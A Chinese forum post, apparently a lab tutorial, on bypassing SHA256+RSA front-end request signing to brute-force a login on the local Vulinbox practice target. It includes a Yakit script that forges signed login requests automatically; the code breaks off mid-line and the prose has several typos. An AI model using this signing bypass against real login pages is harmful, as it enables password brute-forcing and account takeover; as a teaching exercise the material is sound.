ToB企服应用市场:ToB评测及商务社交产业平台

标题: 渗透测试-前端验签绕过之SHA256+RSA [打印本页]
作者: 滴水恩情    时间: 2024-12-14 18:31
标题: 渗透测试-前端验签绕过之SHA256+RSA
本文是高级前端加解密与验签实战的第2篇文章,本系列文章实验靶场为Yakit里自带的Vulinbox靶场,本文陈诉的是绕过SHA256+RSA签名来爆破登录。
绕过


根据提示可以看出这次签名用了SHA2556和RSA两个技术进行加密。
检察源代码可以看到RSA公钥是通过请求服务器获取:

请求一下:http://127.0.0.1:8787/crypto/js/rsa/public/key ,可以看到公钥。

SHA256密钥位置:

Encrypt方法:
  1. function Encrypt(word) {
  2.     console.info(word);
  3.     return  KEYUTIL.getKey(pubkey).encrypt(CryptoJS.HmacSHA256(word, key.toString(CryptoJS.enc.Utf8)).toString());
  4. }
复制代码
KEYUTIL.getKey(pubkey).encrypt是RSA1v15加密方法,在代码中可以看到先辈行SHA265加密,然后再RSA加密。被加密的文本的格式同上文所示。
使用CyberChef加密:

更换请求,可以看到签名构造乐成:

热加载

这是我写的Yakit热加载代码,通过beforeRequest挟制请求包,使用encryptData函数进行加密,getPubkey获取公钥,最终实现热加载自动签名功能。
[code]getPubkey = func() {    //通过请求动态获取公钥    rsp, req = poc.HTTP(`GET /crypto/js/rsa/public/key HTTP/1.1Host: 127.0.0.1:8787    `)~    body = poc.GetHTTPPacketBody(rsp) // 响应体    return body}encryptData = (packet) => {    body = poc.GetHTTPPacketBody(packet)    params = json.loads(body)    name = params.username    pass = params.password    key = "31323334313233343132333431323334"    pemBytes = getPubkey() // 获取公钥    signText = f`username=${name}&password=${pass}`    sha256sign = codec.EncodeToHex(codec.HmacSha256(f`${codec.DecodeHex(key)~}`, signText)) // SHA256加密    rsaSign = codec.EncodeToHex(codec.RSAEncryptWithPKCS1v15(pemBytes /*type: []byte*/, sha256sign)~) // RSA加密    body = f`{"username":"${name}","password":"${pass}","signature":"${rsaSign}","key":"${key}"}`    return string(poc.ReplaceBody(packet, body, false))}//发送到服务端修改数据包// beforeRequest = func(req){//     return encryptData(req)// }//调试用packet =



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4